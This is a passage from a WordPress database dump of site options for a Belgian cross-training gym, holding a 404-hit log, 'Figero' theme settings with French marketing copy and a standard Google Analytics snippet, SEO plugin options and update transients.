s:8:\"referers\";a:1:{i:0;s:52:\"http://www.crosstrainingcenter.be/le-cross-training/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1378436488;}s:84:\"http://www.crosstrainingcenter.be/notre-philosophie/g;m.parentNode.insertBefore(a,m)\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:52:\"http://www.crosstrainingcenter.be/notre-philosophie/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1378436492;}s:78:\"http://www.crosstrainingcenter.be/les-seances/g;m.parentNode.insertBefore(a,m)\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:46:\"http://www.crosstrainingcenter.be/les-seances/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1378436497;}s:74:\"http://www.crosstrainingcenter.be/lequipe/g;m.parentNode.insertBefore(a,m)\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:42:\"http://www.crosstrainingcenter.be/lequipe/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1378436502;}s:74:\"http://www.crosstrainingcenter.be/contact/g;m.parentNode.insertBefore(a,m)\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:42:\"http://www.crosstrainingcenter.be/contact/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1376436067;}s:73:\"http://www.crosstrainingcenter.be/this.options[this.selectedIndex].value;\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:66:\"http://www.crosstrainingcenter.be/g;m.parentNode.insertBefore(a,m)\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1376436072;}s:66:\"http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:0:{}s:11:\"user_agents\";a:1:{i:0;s:19:\"Googlebot-Image/1.0\";}s:13:\"last_hit_time\";i:1377356866;}s:35:\"http://www.crosstrainingcenter.be/(\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:34:\"http://www.crosstrainingcenter.be/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1378436478;}s:53:\"http://www.crosstrainingcenter.be/le-cross-training/(\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:52:\"http://www.crosstrainingcenter.be/le-cross-training/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1378436486;}s:53:\"http://www.crosstrainingcenter.be/notre-philosophie/(\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:52:\"http://www.crosstrainingcenter.be/notre-philosophie/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1378436490;}s:47:\"http://www.crosstrainingcenter.be/les-seances/(\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:46:\"http://www.crosstrainingcenter.be/les-seances/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1378436495;}s:43:\"http://www.crosstrainingcenter.be/lequipe/(\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:42:\"http://www.crosstrainingcenter.be/lequipe/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1378436500;}s:56:\"http://www.crosstrainingcenter.be/pdg/css/960_24_col.css\";a:5:{s:9:\"hit_count\";i:11;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:38:\"http://www.crosstrainingcenter.be/pdg/\";i:1;s:47:\"http://www.crosstrainingcenter.be/pdg/style.css\";}s:11:\"user_agents\";a:5:{i:0;s:128:\"Mozilla/5.0 (iPad; CPU OS 7_0_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A501 Safari/9537.53\";i:1;s:191:\"Mozilla/5.0 (Symbian/3; Series60/5.3 NokiaC7-00/111.040.1511; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/8.3.1.4 Mobile Safari/535.1 3gpp-gba\";i:2;s:132:\"Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; GT-P5110 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\";i:3;s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1\";i:4;s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\";}s:13:\"last_hit_time\";i:1382353690;}s:51:\"http://www.crosstrainingcenter.be/pdg/css/reset.css\";a:5:{s:9:\"hit_count\";i:8;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:38:\"http://www.crosstrainingcenter.be/pdg/\";}s:11:\"user_agents\";a:2:{i:0;s:128:\"Mozilla/5.0 (iPad; CPU OS 7_0_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A501 Safari/9537.53\";i:1;s:191:\"Mozilla/5.0 (Symbian/3; Series60/5.3 NokiaC7-00/111.040.1511; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/8.3.1.4 Mobile Safari/535.1 3gpp-gba\";}s:13:\"last_hit_time\";i:1382212494;}s:101:\"http://www.crosstrainingcenter.be/http:/www.crosstrainingcenter.be/wp-content/themes/figero/style.css\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:98:\"http://crosstrainingcenter.be/http://www.crosstrainingcenter.be/wp-content/themes/figero/style.css\";}s:11:\"user_agents\";a:1:{i:0;s:65:\"Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0\";}s:13:\"last_hit_time\";i:1383139637;}s:134:\"http://www.crosstrainingcenter.be/http:/www.crosstrainingcenter.be/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=3.5.3\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:131:\"http://crosstrainingcenter.be/http://www.crosstrainingcenter.be/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=3.5.3\";}s:11:\"user_agents\";a:1:{i:0;s:65:\"Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0\";}s:13:\"last_hit_time\";i:1383139640;}s:149:\"http://www.crosstrainingcenter.be/http:/www.crosstrainingcenter.be/wp-content/plugins/piklist/parts/css/jquery-ui/jquery-ui.smoothness.css?ver=1.10.3\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:146:\"http://crosstrainingcenter.be/http://www.crosstrainingcenter.be/wp-content/plugins/piklist/parts/css/jquery-ui/jquery-ui.smoothness.css?ver=1.10.3\";}s:11:\"user_agents\";a:1:{i:0;s:65:\"Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0\";}s:13:\"last_hit_time\";i:1383139645;}s:146:\"http://www.crosstrainingcenter.be/http:/www.crosstrainingcenter.be/wp-content/plugins/slideshow-manager/coin-slider/coin-slider-styles.css?ver=3.7\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:143:\"http://crosstrainingcenter.be/http://www.crosstrainingcenter.be/wp-content/plugins/slideshow-manager/coin-slider/coin-slider-styles.css?ver=3.7\";}s:11:\"user_agents\";a:1:{i:0;s:65:\"Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0\";}s:13:\"last_hit_time\";i:1383139648;}s:53:\"http://www2.crosstrainingcenter.be/les-seances-namur/\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:35:\"http://www2.crosstrainingcenter.be/\";}s:11:\"user_agents\";a:1:{i:0;s:120:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36\";}s:13:\"last_hit_time\";i:1383475092;}}}', 'yes'),
(773, 'seo_ultimate_module_import-aiosp', 'a:3:{s:15:\"import_postmeta\";b:1;s:25:\"postmeta_bothexist_action\";s:4:\"skip\";s:17:\"after_post_import\";s:7:\"nothing\";}', 'yes'),
(774, 'seo_ultimate_module_user-code', 'a:1:{s:14:\"global_wp_head\";s:0:\"\";}', 'yes'),
(406, 'wop_options_field', 'a:2:{s:19:\"num_of_wop_sidebars\";s:0:\"\";s:10:\"wop_name_1\";s:8:\"objectif\";}', 'yes'),
(3220, '_transient_timeout_feed_mod_4725d5c1115324486aa3db40a3f9703a', '1383512001', 'no'),
(3223, '_transient_dash_20494a3d90a6669585674ed0eb8dcd8f', '<p>This dashboard widget queries <a href=\"http://blogsearch.google.com/\">Google Blog Search</a> so that when another blog links to your site it will show up here. It has found no incoming links&hellip; yet. It&#8217;s okay &#8212; there is no rush.</p>\n', 'no'),
(139, 'theme_mods_twentytwelve', 'a:1:{s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1369332468;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}', 'yes'),
(140, 'current_theme', 'Figero', 'yes'),
(141, 'theme_mods_figero', 'a:2:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:11:\"custom_menu\";i:2;}}', 'yes'),
(142, 'theme_switched', '', 'yes'),
(143, 'figero_options', 'a:33:{s:11:\"of_template\";a:36:{i:0;a:2:{s:4:\"name\";s:16:\"General Settings\";s:4:\"type\";s:7:\"heading\";}i:1;a:4:{s:4:\"name\";s:11:\"Custom Logo\";s:4:\"desc\";s:61:\"Choose your own logo. Optimal Size: 170px Wide by 30px Height\";s:2:\"id\";s:11:\"figero_logo\";s:4:\"type\";s:6:\"upload\";}i:2;a:4:{s:4:\"name\";s:14:\"Custom Favicon\";s:4:\"desc\";s:71:\"Specify a 16px x 16px image that will represent your website\'s favicon.\";s:2:\"id\";s:14:\"figero_favicon\";s:4:\"type\";s:6:\"upload\";}i:3;a:5:{s:4:\"name\";s:20:\"Google Analytic Code\";s:4:\"desc\";s:58:\"Paste your Google Analytics (or other) tracking code here.\";s:2:\"id\";s:16:\"figero_analytics\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:4;a:2:{s:4:\"name\";s:16:\"Top Feature Area\";s:4:\"type\";s:7:\"heading\";}i:5;a:5:{s:4:\"name\";s:15:\"Feature Heading\";s:4:\"desc\";s:17:\"Enter the Heading\";s:2:\"id\";s:20:\"figero_slideheading1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:6;a:5:{s:4:\"name\";s:19:\"Feature Description\";s:4:\"desc\";s:17:\"Enter description\";s:2:\"id\";s:24:\"figero_slidedescription1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:7;a:5:{s:4:\"name\";s:21:\"Text For First Button\";s:4:\"desc\";s:32:\"Enter the Text for First Button.\";s:2:\"id\";s:18:\"figero_slidel_rb_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:8;a:5:{s:4:\"name\";s:21:\"Link For First Button\";s:4:\"desc\";s:36:\"Enter the Link URL for First Button.\";s:2:\"id\";s:17:\"figero_slidel_r_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:9;a:5:{s:4:\"name\";s:22:\"Text For Second Button\";s:4:\"desc\";s:33:\"Enter the Text for Second Button.\";s:2:\"id\";s:18:\"figero_slidel_lb_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:10;a:5:{s:4:\"name\";s:22:\"Link For Second Button\";s:4:\"desc\";s:37:\"Enter the Link URL for Second Button.\";s:2:\"id\";s:17:\"figero_slidel_l_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:11;a:5:{s:4:\"name\";s:13:\"Feature Image\";s:4:\"desc\";s:67:\"Choose your image to your feature area. Optimal Size: 516px x 300px\";s:2:\"id\";s:18:\"figero_slideimage1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:12;a:2:{s:4:\"name\";s:17:\"Homepage Two Cols\";s:4:\"type\";s:7:\"heading\";}i:13;a:5:{s:4:\"name\";s:19:\"Left Column Heading\";s:4:\"desc\";s:40:\"Enter your heading line for left column.\";s:2:\"id\";s:16:\"figero_headline1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:14;a:5:{s:4:\"name\";s:23:\"Left Column Description\";s:4:\"desc\";s:43:\"Enter your feature content for left column.\";s:2:\"id\";s:15:\"figero_feature1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:15;a:5:{s:4:\"name\";s:20:\"Right Column Heading\";s:4:\"desc\";s:41:\"Enter your heading line for right column.\";s:2:\"id\";s:16:\"figero_headline2\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:16;a:5:{s:4:\"name\";s:18:\"Right Column Image\";s:4:\"desc\";s:38:\"Choose image for right column section.\";s:2:\"id\";s:19:\"figero_testo_image1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:17;a:5:{s:4:\"name\";s:24:\"Right Column Description\";s:4:\"desc\";s:43:\"Enter description for right column section.\";s:2:\"id\";s:18:\"figero_testo_desc1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:18;a:2:{s:4:\"name\";s:25:\"Homepage Featured Section\";s:4:\"type\";s:7:\"heading\";}i:19;a:5:{s:4:\"name\";s:27:\"First Feature Section Image\";s:4:\"desc\";s:44:\"Choose your image for first feature section.\";s:2:\"id\";s:21:\"figero_featured_img_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:20;a:5:{s:4:\"name\";s:29:\"First Feature Section Heading\";s:4:\"desc\";s:50:\"Enter your text heading for first feature section.\";s:2:\"id\";s:19:\"figero_featured_h_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:21;a:5:{s:4:\"name\";s:33:\"First Feature Section Description\";s:4:\"desc\";s:58:\"Enter your content for first feature section descriptions.\";s:2:\"id\";s:17:\"figero_featured_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:22;a:3:{s:4:\"name\";s:23:\"Second Feature Section.\";s:4:\"type\";s:8:\"saperate\";s:5:\"class\";s:9:\"saperator\";}i:23;a:5:{s:4:\"name\";s:28:\"Second Feature Section Image\";s:4:\"desc\";s:45:\"Choose your image for second feature section.\";s:2:\"id\";s:21:\"figero_featured_img_2\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:24;a:5:{s:4:\"name\";s:30:\"Second Feature Section Heading\";s:4:\"desc\";s:51:\"Enter your text heading for second feature section.\";s:2:\"id\";s:19:\"figero_featured_h_2\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:25;a:5:{s:4:\"name\";s:34:\"Second Feature Section Description\";s:4:\"desc\";s:59:\"Enter your content for second feature section descriptions.\";s:2:\"id\";s:17:\"figero_featured_2\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:26;a:3:{s:4:\"name\";s:22:\"Third Feature Section.\";s:4:\"type\";s:8:\"saperate\";s:5:\"class\";s:9:\"saperator\";}i:27;a:5:{s:4:\"name\";s:27:\"Third Feature Section Image\";s:4:\"desc\";s:44:\"Choose your image for third feature section.\";s:2:\"id\";s:21:\"figero_featured_img_3\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:28;a:5:{s:4:\"name\";s:29:\"Third Feature Section Heading\";s:4:\"desc\";s:50:\"Enter your text heading for third feature section.\";s:2:\"id\";s:19:\"figero_featured_h_3\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:29;a:5:{s:4:\"name\";s:33:\"Third Feature Section Description\";s:4:\"desc\";s:58:\"Enter your content for third feature section descriptions.\";s:2:\"id\";s:17:\"figero_featured_3\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:30;a:3:{s:4:\"name\";s:23:\"Fourth Feature Section.\";s:4:\"type\";s:8:\"saperate\";s:5:\"class\";s:9:\"saperator\";}i:31;a:5:{s:4:\"name\";s:28:\"Fourth Feature Section Image\";s:4:\"desc\";s:45:\"Choose your image for fourth feature section.\";s:2:\"id\";s:21:\"figero_featured_img_4\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:32;a:5:{s:4:\"name\";s:30:\"Fourth Feature Section Heading\";s:4:\"desc\";s:51:\"Enter your text heading for fourth feature section.\";s:2:\"id\";s:19:\"figero_featured_h_4\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:33;a:5:{s:4:\"name\";s:34:\"Fourth Feature Section Description\";s:4:\"desc\";s:59:\"Enter your content for fourth feature section descriptions.\";s:2:\"id\";s:17:\"figero_featured_4\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:34;a:2:{s:4:\"name\";s:15:\"Styling Options\";s:4:\"type\";s:7:\"heading\";}i:35;a:5:{s:4:\"name\";s:10:\"Custom CSS\";s:4:\"desc\";s:62:\"Quickly add some CSS to your theme by adding it to this block.\";s:2:\"id\";s:16:\"figero_customcss\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}}s:12:\"of_themename\";s:6:\"Figero\";s:12:\"of_shortname\";s:2:\"of\";s:11:\"figero_logo\";s:76:\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/06/logo-glfe1.png\";s:14:\"figero_favicon\";s:0:\"\";s:16:\"figero_analytics\";s:435:\"<script>\r\n  (function(i,s,o,g,r,a,m){i[\'GoogleAnalyticsObject\']=r;i[r]=i[r]||function(){\r\n  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\r\n  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\r\n  })(window,document,\'script\',\'//www.google-analytics.com/analytics.js\',\'ga\');\r\n\r\n  ga(\'create\', \'UA-42733144-1\', \'crosstrainingcenter.be\');\r\n  ga(\'send\', \'pageview\');\r\n\r\n</script>\";s:20:\"figero_slideheading1\";s:1:\" \";s:24:\"figero_slidedescription1\";s:262:\"Unique en Belgique, une nouvelle façon de faire du fitness. Venez découvrir nos salles de cross training à Namur et à Limelette. Chez nous, vous bénéficierez d’un encadrement professionnel et d’entrainements personnalisés pour atteindre vos objectifs.\";s:18:\"figero_slidel_rb_1\";s:13:\"Essai gratuit\";s:17:\"figero_slidel_r_1\";s:47:\"http://www2.crosstrainingcenter.be/?page_id=266\";s:18:\"figero_slidel_lb_1\";s:12:\"Les séances\";s:17:\"figero_slidel_l_1\";s:46:\"http://www2.crosstrainingcenter.be/?page_id=11\";s:18:\"figero_slideimage1\";s:78:\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/silouhette62.png\";s:16:\"figero_headline1\";s:1:\" \";s:15:\"figero_feature1\";s:1492:\"<br>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding-right: 15px; text-align:justify; width: 50%; padding-bottom:0px\"><div class=\"objectif\">Un coaching personnel</div><br>Un coach vous suivra tout au long de vos séances pour vous proposer des exercices adaptés à votre niveau, vos objectifs et vos caractéristiques individuelles.<br><br><br></td>\r\n<td style=\"border: 0px; padding-left: 15px; text-align:justify; width: 50%;  padding-bottom:0px\"><div class=\"objectif\">Un encadrement professionnel</div><br>Notre équipe est composée de spécialistes issus du milieu de l’éducation physique, de la kinésithérapie, de la diététique et de la médecine.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding-right: 15px; text-align:justify; width: 50%;  padding-bottom:30px\"><div class=\"objectif\">Des outils innovants</div><br>Fini le travail répétitif, monotone et peu efficace des salles de musculation. Grâce aux TRX, RIP Trainer, Kettlebel, … des outils funs, travaillez votre muscle de manière fonctionnelle et performante dans une ambiance conviviale. </td>\r\n<td style=\"border: 0px; padding-left: 15px; text-align:justify; width: 50%;  padding-bottom:30px\"><div class=\"objectif\">Une approche globale</div><br>Pour optimaliser le travail et  vous aider à atteindre vos objectifs, nous vous proposons d’intervenir sur 3 éléments importants : l’alimentation, l’activité physique et le stress.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\";s:16:\"figero_headline2\";s:1:\" \";s:18:\"figero_testo_desc1\";s:0:\"\";s:21:\"figero_featured_img_1\";s:0:\"\";s:19:\"figero_featured_h_1\";s:0:\"\";s:17:\"figero_featured_1\";s:0:\"\";s:0:\"\";s:0:\"\";s:21:\"figero_featured_img_2\";s:0:\"\";s:19:\"figero_featured_h_2\";s:0:\"\";s:17:\"figero_featured_2\";s:0:\"\";s:21:\"figero_featured_img_3\";s:0:\"\";s:19:\"figero_featured_h_3\";s:0:\"\";s:17:\"figero_featured_3\";s:0:\"\";s:21:\"figero_featured_img_4\";s:0:\"\";s:19:\"figero_featured_h_4\";s:0:\"\";s:17:\"figero_featured_4\";s:0:\"\";s:16:\"figero_customcss\";s:0:\"\";s:10:\"of_options\";a:29:{s:11:\"figero_logo\";s:0:\"\";s:14:\"figero_favicon\";s:0:\"\";s:16:\"figero_analytics\";s:0:\"\";s:20:\"figero_slideheading1\";s:0:\"\";s:24:\"figero_slidedescription1\";s:0:\"\";s:18:\"figero_slidel_rb_1\";s:0:\"\";s:17:\"figero_slidel_r_1\";s:0:\"\";s:18:\"figero_slidel_lb_1\";s:0:\"\";s:17:\"figero_slidel_l_1\";s:0:\"\";s:18:\"figero_slideimage1\";s:0:\"\";s:16:\"figero_headline1\";s:0:\"\";s:15:\"figero_feature1\";s:0:\"\";s:16:\"figero_headline2\";s:0:\"\";s:19:\"figero_testo_image1\";s:0:\"\";s:18:\"figero_testo_desc1\";s:0:\"\";s:21:\"figero_featured_img_1\";s:0:\"\";s:19:\"figero_featured_h_1\";s:0:\"\";s:17:\"figero_featured_1\";s:0:\"\";s:0:\"\";s:0:\"\";s:21:\"figero_featured_img_2\";s:0:\"\";s:19:\"figero_featured_h_2\";s:0:\"\";s:17:\"figero_featured_2\";s:0:\"\";s:21:\"figero_featured_img_3\";s:0:\"\";s:19:\"figero_featured_h_3\";s:0:\"\";s:17:\"figero_featured_3\";s:0:\"\";s:21:\"figero_featured_img_4\";s:0:\"\";s:19:\"figero_featured_h_4\";s:0:\"\";s:17:\"figero_featured_4\";s:0:\"\";s:16:\"figero_customcss\";s:0:\"\";}s:19:\"figero_testo_image1\";s:0:\"\";}', 'yes'),
(176, 'widget_pages', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(144, 'of_options', 'a:0:{}', 'yes'),
(145, 'nav_menu_options', 'a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}', 'yes');
INSERT INTO `www_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(223, 'slideshow_option', 'a:13:{s:2:\"fx\";s:5:\"swirl\";s:5:\"delay\";s:4:\"3000\";s:10:\"navigation\";s:4:\"true\";s:5:\"width\";s:3:\"400\";s:6:\"height\";s:3:\"300\";s:3:\"spw\";s:1:\"7\";s:3:\"sph\";s:1:\"5\";s:6:\"sDelay\";s:2:\"30\";s:7:\"opacity\";s:1:\"1\";s:10:\"titleSpeed\";s:3:\"500\";s:10:\"jsmanually\";s:5:\"false\";s:11:\"cssmanually\";s:5:\"false\";s:10:\"hoverPause\";s:5:\"false\";}', 'yes'),
(775, 'seo_ultimate_module_autolinks', 'a:16:{s:25:\"dampen_sitewide_lpa_value\";i:50;s:34:\"enable_perlink_dampen_sitewide_lpa\";b:0;s:17:\"enable_self_links\";b:0;s:24:\"enable_current_url_links\";b:0;s:15:\"limit_lpp_value\";i:5;s:15:\"limit_lpa_value\";i:2;s:15:\"limit_lpu_value\";i:1;s:13:\"linkfree_tags\";s:30:\"code,pre,kbd,h1,h2,h3,h4,h5,h6\";s:22:\"autolink_posttype_post\";b:1;s:22:\"autolink_posttype_page\";b:1;s:28:\"autolink_posttype_attachment\";b:1;s:31:\"autolink_posttype_collaborateur\";b:1;s:26:\"footer_link_section_format\";s:67:\"<div id=\"su-footer-links\" style=\"text-align: center;\">{links}</div>\";s:18:\"footer_link_format\";s:6:\"{link}\";s:15:\"footer_link_sep\";s:3:\" | \";s:5:\"links\";a:0:{}}', 'yes'),
(776, 'seo_ultimate_module_settings', 'a:3:{s:16:\"attribution_link\";b:0;s:9:\"mark_code\";b:1;s:11:\"wp_ultimate\";b:1;}', 'yes'),
(777, 'seo_ultimate_module_internal-link-aliases', 'a:2:{s:9:\"alias_dir\";s:2:\"go\";s:7:\"aliases\";a:0:{}}', 'yes'),
(778, 'seo_ultimate_module_linkbox', 'a:1:{s:4:\"html\";s:298:\"<div class=\"su-linkbox\" id=\"post-{id}-linkbox\"><div class=\"su-linkbox-label\">Link to this post!</div><div class=\"su-linkbox-field\"><input type=\"text\" value=\"&lt;a href=&quot;{url}&quot;&gt;{title}&lt;/a&gt;\" onclick=\"javascript:this.select()\" readonly=\"readonly\" style=\"width: 100%;\" /></div></div>\";}', 'yes'),
(3059, '_site_transient_update_core', 'O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:41:\"https://wordpress.org/wordpress-3.7.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:41:\"https://wordpress.org/wordpress-3.7.1.zip\";s:10:\"no_content\";s:52:\"https://wordpress.org/wordpress-3.7.1-no-content.zip\";s:11:\"new_bundled\";s:53:\"https://wordpress.org/wordpress-3.7.1-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"3.7.1\";s:7:\"version\";s:5:\"3.7.1\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"3.6\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1383555264;s:15:\"version_checked\";s:5:\"3.7.1\";s:12:\"translations\";a:0:{}}', 'yes'),
(2859, 'can_compress_scripts', '0', 'yes'),
(3218, '_transient_timeout_feed_4725d5c1115324486aa3db40a3f9703a', '1383512001', 'no'),
(3162, '_transient_timeout_settings_errors', '1383293978', 'no'),
(3163, '_transient_settings_errors', 'a:1:{i:0;a:4:{s:7:\"setting\";s:7:\"general\";s:4:\"code\";s:16:\"settings_updated\";s:7:\"message\";s:15:\"Settings saved.\";s:4:\"type\";s:7:\"updated\";}}', 'no'),
(3165, '_site_transient_timeout_browser_00760e848c8aef5785b4a3f89f42352c', '1383901005', 'yes'),
(3166, '_site_transient_browser_00760e848c8aef5785b4a3f89f42352c', 'a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"30.0.1599.101\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}', 'yes'),
